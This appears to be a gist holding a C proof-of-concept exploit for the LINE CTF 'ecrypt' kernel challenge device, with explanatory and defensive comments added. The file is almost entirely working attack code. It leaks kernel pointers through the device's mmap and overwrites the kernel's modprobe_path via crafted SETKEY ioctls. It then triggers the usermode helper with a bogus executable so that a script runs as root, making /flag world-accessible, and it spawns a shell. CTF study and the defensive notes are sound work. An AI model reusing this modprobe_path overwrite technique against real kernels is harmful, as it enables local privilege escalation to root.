Created
March 27, 2022 00:08
linectf ecrypt
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
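/*
 * ioctl request codes passed to the /dev/ecrypt challenge device below.
 * The values come from the challenge; what the driver does for each one is
 * not visible in this file. RESETKEY and RESETIV are defined but never used
 * here. (The trailing "| |" table residue from the page rendering has been
 * dropped so the definitions compile.)
 */
#define SETKEY   0x3003003
#define SETIV    0x4004004
#define RESETKEY 0x5005005
#define RESETIV  0x6006006

/* One zero-filled page, handed to the first SETKEY/SETIV calls in main(). */
char buf[0x1000] = {0};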
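/*
 * Final stage of the CTF proof-of-concept, run after main() has changed the
 * kernel's module-helper path.
 *
 * It writes a two-line shell script to /tmp/x (which makes /flag
 * world-accessible), creates /tmp/asd containing four 0xff bytes, executes
 * that file, and then starts an interactive shell. The four bytes match no
 * executable format, so running the file is what is expected to make the
 * kernel invoke its module-helper program.
 *
 * Defensive notes: the helper runs with kernel-spawned (root) privileges, so
 * any change to kernel.modprobe (/proc/sys/kernel/modprobe) is worth
 * alerting on, and CONFIG_STATIC_USERMODEHELPER removes the runtime-writable
 * helper path altogether.
 */
void modprobe_hax(void)
{
    system("echo '#!/bin/sh' > /tmp/x; echo 'chmod 777 /flag' >> /tmp/x");
    system("chmod +x /tmp/x");

    /* O_CREAT requires an explicit mode; the original call omitted it, so
     * the file's permissions came from whatever was left in the argument
     * slot. */
    int ff = open("/tmp/asd", O_WRONLY | O_CREAT, 0700);
    if (ff < 0) {
        perror("open /tmp/asd");
    } else {
        if (write(ff, "\xff\xff\xff\xff", 4) != 4) {
            perror("write /tmp/asd");
        }
        close(ff);
    }

    system("chmod 777 /tmp/asd; /tmp/asd");
    system("sh");
}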
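/*
 * Proof-of-concept for the LINE CTF "ecrypt" challenge device.
 *
 * What the code below does, in order:
 *   1. opens /dev/ecrypt and issues SETKEY and SETIV with a zero-filled page;
 *   2. maps one page of the device at file offset 0x1000 and prints every
 *      non-zero 64-bit word it finds there;
 *   3. derives two addresses from ptr[1] using offsets that are hard-coded
 *      for the challenge kernel build, then alternates writes to ptr[0]
 *      with further SETKEY calls;
 *   4. reads the first 8 bytes of /proc/sys/kernel/modprobe, stores them in
 *      ptr[0], issues SETKEY with "/tmp/x", and calls modprobe_hax().
 *
 * The driver source is not part of this file, so exactly why the mapping
 * exposes these words is not shown here. NOTE(review): the mapping appears
 * to hand user space a page holding kernel pointers that the driver later
 * trusts, which is confirmed only by the driver code.
 *
 * Defensive takeaways: a driver's mmap handler must restrict offset and
 * length to a buffer meant for user space, and must never re-read pointers
 * from memory that user space can write. Unexpected changes to
 * kernel.modprobe are a useful detection signal.
 *
 * Returns 0 after modprobe_hax() returns, 1 if the device cannot be opened
 * or mapped, or if the current helper path cannot be read.
 */
int main(void) {
    int result;

    int fd = open("/dev/ecrypt", O_RDWR);
    printf("[*] fd: %d\n", fd);
    if (fd < 0) {
        perror("open /dev/ecrypt");
        return 1;
    }

    result = ioctl(fd, SETKEY, buf);
    printf("[*] SETKEY: %d\n", result);
    result = ioctl(fd, SETIV, buf);
    printf("[*] SETIV: %d\n", result);

    /* The address is only a placement hint (no MAP_FIXED); it needs an
     * explicit cast because mmap() takes a pointer. */
    uint64_t *ptr = mmap((void *)0xcafebabe000, 0x1000, PROT_READ | PROT_WRITE,
                         MAP_SHARED, fd, 0x1000);
    printf("[*] mmap!! -> %p\n", (void *)ptr);
    if (ptr == MAP_FAILED) {
        /* The original dereferenced the result unconditionally. */
        perror("mmap");
        close(fd);
        return 1;
    }

    /* 512 words * 8 bytes = the whole 0x1000-byte mapping. */
    for (int i = 0; i < 512; i++) {
        if (ptr[i] != 0) {
            printf("[*] ptr[%d]: %lx\n", i, (unsigned long)ptr[i]);
        }
    }

    char asd[] = "modprobe";
    result = ioctl(fd, SETKEY, asd);
    printf("[*] SETKEY: %d\n", result);

    /* ptr[1] with its low 28 bits cleared serves as a base; the constants
     * are offsets valid only for the challenge kernel image. */
    uint64_t modprobe = (ptr[1] & ~0xfffffff) + 0x3502540-0x10;
    uint64_t _modprobe = modprobe - 0x3502540 + 0x264e608 + 0x10;
    uint64_t modprobe_ctl[] = {0, 0, ptr[0], _modprobe};

    ptr[0] = modprobe;
    result = ioctl(fd, SETKEY, (void *)modprobe_ctl);

    int mp = open("/proc/sys/kernel/modprobe", 0);
    uint64_t modprobe_path = 0;
    if (mp < 0 || read(mp, &modprobe_path, 8) != 8) {
        /* Do not continue with an uninitialised value, as the original did. */
        perror("read /proc/sys/kernel/modprobe");
        if (mp >= 0) {
            close(mp);
        }
        close(fd);
        return 1;
    }
    close(mp);

    ptr[0] = modprobe_path;
    printf("modprobe: %#lx\n", (unsigned long)modprobe_path);

    /* "/tmp/x" (7 bytes with the terminator) fits in the 9-byte asd array. */
    strcpy(asd, "/tmp/x");
    ioctl(fd, SETKEY, asd);

    modprobe_hax();
    return 0;
}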